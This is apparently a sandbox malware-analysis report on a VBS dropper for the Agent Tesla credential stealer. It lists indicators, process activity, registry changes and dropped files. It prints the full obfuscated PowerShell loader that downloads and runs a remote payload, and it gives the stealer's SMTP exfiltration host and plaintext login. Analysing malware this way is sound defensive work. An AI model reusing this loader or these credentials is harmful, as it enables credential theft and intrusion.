File name:

8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs

Full analysis: https://app.any.run/tasks/a4bd0fad-7846-4629-836a-3eb7570d803d
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Malware Trends Tracker     >>>
Analysis date: March 19, 2024, 08:52:56
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
stealer
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

C76A93BC5DB1B5A8F1E064AB0E51A4D0

SHA1:

D9BC68197C03634E12AD62F01C078EB1BC9722BB

SHA256:

8DFC4DA6CDDBE96A8EEE81460A0352846A686AE31B567742F4F7E19C0A778C46

SSDEEP:

3072:sP4yENVBkYr4LhpVXpKnupn8kH3DPbkhZi3eNRMpWOuMvmOfyYqygQXUqIZm+:sP4yENVOY0NpVXpK68kH3DPbkhZi3eND

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Actions looks like stealing of personal data

      • wab.exe (PID: 5672)

    • Steals credentials from Web Browsers

      • wab.exe (PID: 5672)

    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 5672)

    • Scans artifacts that could help determine the target

      • wab.exe (PID: 5672)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2532)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)

    • Evaluates numerical expressions in cmd (potential data obfuscation)

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 5672)

    • Checks Windows Trust Settings

      • wab.exe (PID: 5672)

    • Checks for external IP

      • wab.exe (PID: 5672)

    • Connects to SMTP port

      • wab.exe (PID: 5672)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)

    • Checks supported languages

      • wab.exe (PID: 5672)

    • Reads the computer name

      • wab.exe (PID: 5672)

    • Checks proxy server information

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 5672)

    • Reads the software policy settings

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)

    • Creates files or folders in the user directory

      • wab.exe (PID: 5672)

    • Reads Environment values

      • wab.exe (PID: 5672)

    • Reads Microsoft Office registry keys

      • wab.exe (PID: 5672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(5672) wab.exe
Protocolsmtp
Hostmail.ardsmmm.com
Port587
Usernameinfo@ardsmmm.com
PasswordArd2015**
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs #AGENTTESLA wab.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1068"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spermagonia sknhedsaabenbaringens Eftermiddagsforestillinger Manipulatory Forureningsbegrebene #>;$everwho=(cmd /c set /A 115^^0);Function Elskerinder ([String]$Programmel){$everwho=[char][int]$everwho;$Tilskudsregelensnvaliditets=$everwho+'ubstring';$Misterming=8;$Nettovgtenes=opholdsomraadet($Programmel);For($Tilskudsregelens=7; $Tilskudsregelens -lt $Nettovgtenes; $Tilskudsregelens+=$Misterming){$Chutists=$Programmel.$Tilskudsregelensnvaliditets.Invoke($Tilskudsregelens, 1);$Simosaurus=$Simosaurus+$Chutists;}$Simosaurus;}function Pitbird ($Pawnor){. ($Oceanologer) ($Pawnor);}function opholdsomraadet ([String]$isopogonous){$Ingenirgerningerne=$isopogonous.Length-1;$Ingenirgerningerne;}$Glacon=Elskerinder 'Uddr geT LgeundrWo,dsycaUdgift,nDentninsRetsp.ifBorteske PanayarAmb,tior.quilibiDigekronAspsteugNond ce ';$Registreringspligter=Elskerinder 'Unme,eshKofusket LignintOdontoipEncinalsHyp.rtr: Disc n/S.marbe/AutoerodVa iolarMicrophi .rydnivInos,oaeRadevor.SubjpongC tholioSub.erroWasteingIndsbnilnamaq.aeCommont.H,rmafrcDistin oHor eummProst.t/Konfek,uarmlngdcScaurie?TranspleVersatix AktieppControvoEsse.serH.ubitst,aknemm=Na.tehidStrychno,appendwOutcre.n FrdigblNonsensoNo emcoaDuoersrdSofacyk&Thinglii S,skatdshopocr=Flaadde1Diddest0AftrdrirJavanesxIdea ios MomiolHBeklageG.ameablyR imondlIn.estmM Exil.n5OrdreekXAktionrj scendedPlac.an8 nnestlGProsodu5ConcussrIshmaelEamorfeiZ UnchemOStip laUPreapprCUd,mmebEregenerrChuggertLeptomo3 LatchltBlokfunZbearpawbRigse.baDebattryAmtsraawOswegoa ';$Oceanologer=Elskerinder 'AsieerfisaltnineUnlingexK.adran ';$Kollaborationers19=Elskerinder 'Superbe$fangedegMissionlTollento Delectb Parabea Flag.il Afrens:VioloneWReallnsi CineplnHjree,sd ApplicsPentanduStudievrHjerterfSynneuse Disponn Kynde,dPensi,neRent,besmisvist1Ba,ales8Skuffem7Halteri Wanting=Fejlmar Sk,ldflSInterc.tcounteraSt,eetwrUnwatertRebutta-FlbetssBNonclimiDistingtInvokedsNonradiTStileemrpredestaStumtjenTimefulsPegefinfHvdettee chesterDrab,ma Oldem,-PolytekS PowderoMustineuWeaponsrAarsta.cUnrul eeNationa Ddsstra$SkibstmRSvalegaeTro ersgPo rgaei FingersHedeblgtD lettarfossi,ie aderasr Tegnefi AntirenMonroligGeneralsHerrernpRadonurl remailimopboargPo.phyrt FranskeKume.ierDissert Lidseev-UninvigDaffricae S.bnatsPostcomtWhitewoiUln geun udfrdiaGrapholt Axt,eeiLoutishoE.hvervn Unwebb Lirkep$SalgsdiDVarmeler Inembrv Indstro Regl rgMagtedetSa.gsmae Dop,ngrCrumbiee Flnse.rRetsmed ';Pitbird (Elskerinder 'metodis$Tinta lgVidenskl Fyld.goJoukerybfritureaOverpr.lTribute: AdderiD Scle trDiarrsrv BaltisoMidsommgPlimraatProtoleeAendrinr Nab,breKleenexrTempusf=Sjappeg$SkopudseBroid,rnblo.forvGi arti: StoremaDedicatpcystinup KnappedPartikaaShireestRototilaHelbred ') ;Pitbird (Elskerinder 'OchringISkolarsmPhilosopSifonsfoIversenrSwordgrtenkemnd- NoumenMBirlerjoStrengedAvowabluelfenbelToyscyteApotele Forba.rBTrisylliAfmnstrtKerne.es SucceeTVvninggrCpusanta Fregnen Hallo,s FractafAtomaffepat,uljrPeritom ') ;$Drvogterer=$Drvogterer+'\Mannersome.Jas' ;Pitbird (Elskerinder 'Depreda$Plattelg Te,raslFoozlero U,ocenbInderk a Ma skslmagneti:EarstonK.ommunao.antamkmVaregldmTo,ngleaCapsulinAntechadFadgedmoSlibrigtafsondryIntuitipuni,luseDysodi,n,ymbolisgarialf=Ampulla(SkatteiTFoeltaieforblstsForblomt Hesper-ReshocePvic,neuaSulphurtfosso.ihNimurta Withers$HerlufmD .woundr ormaldvStiletho Artelsgvelsespt TravaleUpte.rsrTandemmeG.untyerS umarb)chimney ') ;while (-not $Kommandotypens) {Pitbird (Elskerinder 'Ka,ksteIdis endf Outv c Amst,up( Idiose$ let anWLek.ikaiAmary,ln Skue pd AphthissentimeuDekadenrMaanedafKnawelseKrak.lsnForbi dd LovligeUudsl.ts Overra1,ppleti8Bluede,7Reumati. EnergiJAsselfto NulstibRoycesiSNewspaptMillimeaDrift,gtFabul,reO lsdrm Metrosa-ProfesseMilevidqRetrans Hjhuset$KapsmbaG HydrarlBrnehavaNetvrkscFiksersoAvancemn He,ago)Ko.cent observa{Unfreq SGo,elintMakrop.aDumb,ourNightsptHistori-FreudiaSStrm,evl Hy.roleMillia,e Tel.nepPulingl Hematom1 Arbejd}Prelatie CerouslKapunersGo.lieseexonera{UsurperSBobadiltunassura Udbld rAdiposetHum ede- Kvld rS PythaglTetrammesuasiveeBreddespStandar Frilgge1Sterlet;PinkeyeP MarkariOpvoksetCerningbd sartiiProconfrLaeserudUnringi olsmnd$U ortalKTaljereoSmaavasl EligiblRetninga ordkrib SonsieoSprightrNeighboaUnpaupet RakeryiMacr,pooTeknok nAnesthaeVarmeslr.toikersP.oprie1Ak.ionr9Befordr}instruc ');Pitbird (Elskerinder 'Sprngfa$Husblasg ruktoslPolletao ,ruppebAngorasa PoloidlInven i:FordrinKFindelnoKampkunmGnostikmPreacheaVerbessnKongruedSlerundoImprovit.rbejdsyVig liepusingsieMikr,sknP nplegsguddoms=Enchodo( shellsT karyateInfractsBurgonet Sali y- illionPSquibcraaandendtAflvninhLu inou Vivisek$KnbjninDlurifakrHaabenevKnubango QuadrugUndersktdemursceKodedekrR,foundeUnfraterSelvb.d)Te krat ') ;}Pitbird (Elskerinder 'Demo.al$Rabatg gPodophtlturetb,oGltmercbCavespiaSurreptlDybgang:soveposTT.eomaniWyat,naseudialysBudgetoeProctodnSpindehdGulspureNationa G.atem=Fiske i S etlaGReimposeBesaan,t.hilier-Ba.tardCSpans,roUnoterenShutin,tPredevoeIncremengoofingtmor idi Tronflg$UteroloDBunin hr,rnumrevudstdnioKellysag Grimplt StranseAarstalrOmstni,ePa,riotr Diver ');Pitbird (Elskerinder ' Transs$Op.endigSenatsml ToxogloForblffb SmitstaDooziealOverpro: FasedeBIndertrl TjeneseCurwhibpPlastikhReprimeabredererDeputataInca oc2Baadvrf5Stjrten Hammers=Croupin Seedsme[.vulstiSRddeligyHanebjlsAcharyatLserbr.e Af,ropm Septen.An.amliCFiskehaoP,tagonnCha icovMyoglobeOpdrtterParoxyttNeph od]foroege: inflat: S agteF P.ecedrUnindigoA.ticarmSympatiBDansantaAccelersEfterfleFuruncu6Interpr4 CampinSTriasfot Solaarr BegraviDrk,rmsn Teatreg.olumes( Tudeho$ObrogatTTolvtaliKuarsyns Fl,wsmsTjretscestfrontn Ento odDartleseTetrar )Trrelse ');Pitbird (Elskerinder 'Tidsste$ BlattagUpalleylBesvrlioProctopbClasm taP.rtmanlTrouble:PlacardS Cherylk Taga,ayUd.eligdKonkur.eUndigitv PensioiFungivonUan,kuedVoluptuu.ugteneeRestindrpap rus Indel k=Sniffle Ka,itt[ coolamSSikkerhyHoneysssdyppelstIn.hsteeSsk,ndem Resul .M.ngfolTRosenshe De,ertxDressertsmaikra.Nulls,iEAkt.tykn Re,entcDeratizo paasked unctioi Flexibnsammensg,djamen]Afsone.:R.mdisk: PaaligAEnarme.SPrein,rCTimet.rIKen,emrIV lpici.Prosc.lGUdslusnesongishtNonvenaSleverintse.rsskrVerdensiLiteratnBehandlg Dentil(Landska$NemmedeBGedesbylAfhaarieGrisedepLystbaah .chervaAnvenderLetfordaWhitest2Spidser5Samment)Auxamyl ');Pitbird (Elskerinder ' archit$Pileat,gE yoreblPo ychroTankninbKonomiba monochlSismoth:SpisestkStedsbiostandarlFljlsble BombesrAlba itaf.lkeuneTunnelmpGigantoi AlkylodJobskabe Ghettom Somme iRumdumhsUnde.si=Haerene$Tilsta SUntermik.ippopoyBortadodVa,rdieeLserforvTrip asiAktuelln peccabds.angstuRylenbaeHyperadr degnes. NonsilsLeaventuElegancbMadonnasBeruthitMendelsrTaprobaiO egasgnFugtdangOverexc(breadle3trenche3 Scrayf2 ornbls9 Fabrik1 Beewee9legacyk,Sous,he3 Plai e0Afgasni7Fohnsb.6Viscosi9Extrava) immigr ');Pitbird $koleraepidemis;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1404C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
2260"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Spermagonia sknhedsaabenbaringens Eftermiddagsforestillinger Manipulatory Forureningsbegrebene #>;$everwho=(cmd /c set /A 115^^0);Function Elskerinder ([String]$Programmel){$everwho=[char][int]$everwho;$Tilskudsregelensnvaliditets=$everwho+'ubstring';$Misterming=8;$Nettovgtenes=opholdsomraadet($Programmel);For($Tilskudsregelens=7; $Tilskudsregelens -lt $Nettovgtenes; $Tilskudsregelens+=$Misterming){$Chutists=$Programmel.$Tilskudsregelensnvaliditets.Invoke($Tilskudsregelens, 1);$Simosaurus=$Simosaurus+$Chutists;}$Simosaurus;}function Pitbird ($Pawnor){. ($Oceanologer) ($Pawnor);}function opholdsomraadet ([String]$isopogonous){$Ingenirgerningerne=$isopogonous.Length-1;$Ingenirgerningerne;}$Glacon=Elskerinder 'Uddr geT LgeundrWo,dsycaUdgift,nDentninsRetsp.ifBorteske PanayarAmb,tior.quilibiDigekronAspsteugNond ce ';$Registreringspligter=Elskerinder 'Unme,eshKofusket LignintOdontoipEncinalsHyp.rtr: Disc n/S.marbe/AutoerodVa iolarMicrophi .rydnivInos,oaeRadevor.SubjpongC tholioSub.erroWasteingIndsbnilnamaq.aeCommont.H,rmafrcDistin oHor eummProst.t/Konfek,uarmlngdcScaurie?TranspleVersatix AktieppControvoEsse.serH.ubitst,aknemm=Na.tehidStrychno,appendwOutcre.n FrdigblNonsensoNo emcoaDuoersrdSofacyk&Thinglii S,skatdshopocr=Flaadde1Diddest0AftrdrirJavanesxIdea ios MomiolHBeklageG.ameablyR imondlIn.estmM Exil.n5OrdreekXAktionrj scendedPlac.an8 nnestlGProsodu5ConcussrIshmaelEamorfeiZ UnchemOStip laUPreapprCUd,mmebEregenerrChuggertLeptomo3 LatchltBlokfunZbearpawbRigse.baDebattryAmtsraawOswegoa ';$Oceanologer=Elskerinder 'AsieerfisaltnineUnlingexK.adran ';$Kollaborationers19=Elskerinder 'Superbe$fangedegMissionlTollento Delectb Parabea Flag.il Afrens:VioloneWReallnsi CineplnHjree,sd ApplicsPentanduStudievrHjerterfSynneuse Disponn Kynde,dPensi,neRent,besmisvist1Ba,ales8Skuffem7Halteri Wanting=Fejlmar Sk,ldflSInterc.tcounteraSt,eetwrUnwatertRebutta-FlbetssBNonclimiDistingtInvokedsNonradiTStileemrpredestaStumtjenTimefulsPegefinfHvdettee chesterDrab,ma Oldem,-PolytekS PowderoMustineuWeaponsrAarsta.cUnrul eeNationa Ddsstra$SkibstmRSvalegaeTro ersgPo rgaei FingersHedeblgtD lettarfossi,ie aderasr Tegnefi AntirenMonroligGeneralsHerrernpRadonurl remailimopboargPo.phyrt FranskeKume.ierDissert Lidseev-UninvigDaffricae S.bnatsPostcomtWhitewoiUln geun udfrdiaGrapholt Axt,eeiLoutishoE.hvervn Unwebb Lirkep$SalgsdiDVarmeler Inembrv Indstro Regl rgMagtedetSa.gsmae Dop,ngrCrumbiee Flnse.rRetsmed ';Pitbird (Elskerinder 'metodis$Tinta lgVidenskl Fyld.goJoukerybfritureaOverpr.lTribute: AdderiD Scle trDiarrsrv BaltisoMidsommgPlimraatProtoleeAendrinr Nab,breKleenexrTempusf=Sjappeg$SkopudseBroid,rnblo.forvGi arti: StoremaDedicatpcystinup KnappedPartikaaShireestRototilaHelbred ') ;Pitbird (Elskerinder 'OchringISkolarsmPhilosopSifonsfoIversenrSwordgrtenkemnd- NoumenMBirlerjoStrengedAvowabluelfenbelToyscyteApotele Forba.rBTrisylliAfmnstrtKerne.es SucceeTVvninggrCpusanta Fregnen Hallo,s FractafAtomaffepat,uljrPeritom ') ;$Drvogterer=$Drvogterer+'\Mannersome.Jas' ;Pitbird (Elskerinder 'Depreda$Plattelg Te,raslFoozlero U,ocenbInderk a Ma skslmagneti:EarstonK.ommunao.antamkmVaregldmTo,ngleaCapsulinAntechadFadgedmoSlibrigtafsondryIntuitipuni,luseDysodi,n,ymbolisgarialf=Ampulla(SkatteiTFoeltaieforblstsForblomt Hesper-ReshocePvic,neuaSulphurtfosso.ihNimurta Withers$HerlufmD .woundr ormaldvStiletho Artelsgvelsespt TravaleUpte.rsrTandemmeG.untyerS umarb)chimney ') ;while (-not $Kommandotypens) {Pitbird (Elskerinder 'Ka,ksteIdis endf Outv c Amst,up( Idiose$ let anWLek.ikaiAmary,ln Skue pd AphthissentimeuDekadenrMaanedafKnawelseKrak.lsnForbi dd LovligeUudsl.ts Overra1,ppleti8Bluede,7Reumati. EnergiJAsselfto NulstibRoycesiSNewspaptMillimeaDrift,gtFabul,reO lsdrm Metrosa-ProfesseMilevidqRetrans Hjhuset$KapsmbaG HydrarlBrnehavaNetvrkscFiksersoAvancemn He,ago)Ko.cent observa{Unfreq SGo,elintMakrop.aDumb,ourNightsptHistori-FreudiaSStrm,evl Hy.roleMillia,e Tel.nepPulingl Hematom1 Arbejd}Prelatie CerouslKapunersGo.lieseexonera{UsurperSBobadiltunassura Udbld rAdiposetHum ede- Kvld rS PythaglTetrammesuasiveeBreddespStandar Frilgge1Sterlet;PinkeyeP MarkariOpvoksetCerningbd sartiiProconfrLaeserudUnringi olsmnd$U ortalKTaljereoSmaavasl EligiblRetninga ordkrib SonsieoSprightrNeighboaUnpaupet RakeryiMacr,pooTeknok nAnesthaeVarmeslr.toikersP.oprie1Ak.ionr9Befordr}instruc ');Pitbird (Elskerinder 'Sprngfa$Husblasg ruktoslPolletao ,ruppebAngorasa PoloidlInven i:FordrinKFindelnoKampkunmGnostikmPreacheaVerbessnKongruedSlerundoImprovit.rbejdsyVig liepusingsieMikr,sknP nplegsguddoms=Enchodo( shellsT karyateInfractsBurgonet Sali y- illionPSquibcraaandendtAflvninhLu inou Vivisek$KnbjninDlurifakrHaabenevKnubango QuadrugUndersktdemursceKodedekrR,foundeUnfraterSelvb.d)Te krat ') ;}Pitbird (Elskerinder 'Demo.al$Rabatg gPodophtlturetb,oGltmercbCavespiaSurreptlDybgang:soveposTT.eomaniWyat,naseudialysBudgetoeProctodnSpindehdGulspureNationa G.atem=Fiske i S etlaGReimposeBesaan,t.hilier-Ba.tardCSpans,roUnoterenShutin,tPredevoeIncremengoofingtmor idi Tronflg$UteroloDBunin hr,rnumrevudstdnioKellysag Grimplt StranseAarstalrOmstni,ePa,riotr Diver ');Pitbird (Elskerinder ' Transs$Op.endigSenatsml ToxogloForblffb SmitstaDooziealOverpro: FasedeBIndertrl TjeneseCurwhibpPlastikhReprimeabredererDeputataInca oc2Baadvrf5Stjrten Hammers=Croupin Seedsme[.vulstiSRddeligyHanebjlsAcharyatLserbr.e Af,ropm Septen.An.amliCFiskehaoP,tagonnCha icovMyoglobeOpdrtterParoxyttNeph od]foroege: inflat: S agteF P.ecedrUnindigoA.ticarmSympatiBDansantaAccelersEfterfleFuruncu6Interpr4 CampinSTriasfot Solaarr BegraviDrk,rmsn Teatreg.olumes( Tudeho$ObrogatTTolvtaliKuarsyns Fl,wsmsTjretscestfrontn Ento odDartleseTetrar )Trrelse ');Pitbird (Elskerinder 'Tidsste$ BlattagUpalleylBesvrlioProctopbClasm taP.rtmanlTrouble:PlacardS Cherylk Taga,ayUd.eligdKonkur.eUndigitv PensioiFungivonUan,kuedVoluptuu.ugteneeRestindrpap rus Indel k=Sniffle Ka,itt[ coolamSSikkerhyHoneysssdyppelstIn.hsteeSsk,ndem Resul .M.ngfolTRosenshe De,ertxDressertsmaikra.Nulls,iEAkt.tykn Re,entcDeratizo paasked unctioi Flexibnsammensg,djamen]Afsone.:R.mdisk: PaaligAEnarme.SPrein,rCTimet.rIKen,emrIV lpici.Prosc.lGUdslusnesongishtNonvenaSleverintse.rsskrVerdensiLiteratnBehandlg Dentil(Landska$NemmedeBGedesbylAfhaarieGrisedepLystbaah .chervaAnvenderLetfordaWhitest2Spidser5Samment)Auxamyl ');Pitbird (Elskerinder ' archit$Pileat,gE yoreblPo ychroTankninbKonomiba monochlSismoth:SpisestkStedsbiostandarlFljlsble BombesrAlba itaf.lkeuneTunnelmpGigantoi AlkylodJobskabe Ghettom Somme iRumdumhsUnde.si=Haerene$Tilsta SUntermik.ippopoyBortadodVa,rdieeLserforvTrip asiAktuelln peccabds.angstuRylenbaeHyperadr degnes. NonsilsLeaventuElegancbMadonnasBeruthitMendelsrTaprobaiO egasgnFugtdangOverexc(breadle3trenche3 Scrayf2 ornbls9 Fabrik1 Beewee9legacyk,Sous,he3 Plai e0Afgasni7Fohnsb.6Viscosi9Extrava) immigr ');Pitbird $koleraepidemis;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2532"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4076\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5672"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla
(PID) Process(5672) wab.exe
Protocolsmtp
Hostmail.ardsmmm.com
Port587
Usernameinfo@ardsmmm.com
PasswordArd2015**
6044"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
6680"C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
17 735
Read events
17 688
Write events
47
Delete events
0

Modification events

(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2532) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1068) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2260) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2260) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
0
Suspicious files
7
Text files
5
Unknown types
3

Dropped files

PID
Process
Filename
Type
2260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ciayleg2.f4h.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAder
MD5:AC89A852C2AAA3D389B2D2DD312AD367
SHA256:0B720E19270C672F9B6E0EC40B468AC49376807DE08A814573FE038779534F45
2260powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:C76555487F3760099709FD7487BFB259
SHA256:AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAder
MD5:DBA737766CAA750561A7D1EF422724CB
SHA256:5709B340759D61E0BE8D4258B9BA874F6DE6E02E9519E6BB5FF32CEF2F4B5D16
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2Dder
MD5:A6384E23EBEA2B95082022A9EAA0F346
SHA256:2865568586BAFF0C8C404940257D5FC586E495A267C169F875E3D22325B15A9C
2260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xgleqfvy.sbo.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c43hbwvk.kqy.ps1text
